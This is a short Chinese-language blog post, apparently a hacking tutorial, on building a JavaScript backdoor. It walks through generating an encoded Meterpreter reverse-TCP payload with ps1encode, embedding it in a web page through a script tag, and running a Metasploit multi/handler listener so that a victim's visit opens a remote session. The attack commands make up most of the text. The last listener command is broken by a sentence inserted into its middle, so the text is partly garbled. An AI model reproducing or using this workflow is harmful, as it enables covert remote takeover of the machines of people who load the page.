JavaScript後門建立與使⽤
阿新 • • 發佈:2021-11-30
JavaScript後門建立與使⽤
前言
今天介紹一種小眾的js後門獲取shell,使用ps1encode來加密反彈後門。
工具地址:https://github.com/CroweCybersecurity/ps1encode
正文
在檔案目錄下用下面的命令生成反彈shell的js程式碼,填入監聽機的ip和port
./ps1encode.rb --LHOST [Port] --LPORT [Port] --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js
成功生成js程式碼
將上面加密後的js程式碼儲存到一個.js的檔案中
通過js語法,將剛剛儲存的js檔案內嵌到html中
<script src="u.js"></script>
此時在msf中開啟監聽
msf6 > use multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lport 4444 msf6 exploit(multi/handler) > set lhost 192.168.80.131 msf6 exploit(multi當訪問帶有js的html⽹⻚時,kali成功獲取到會話/handler) > run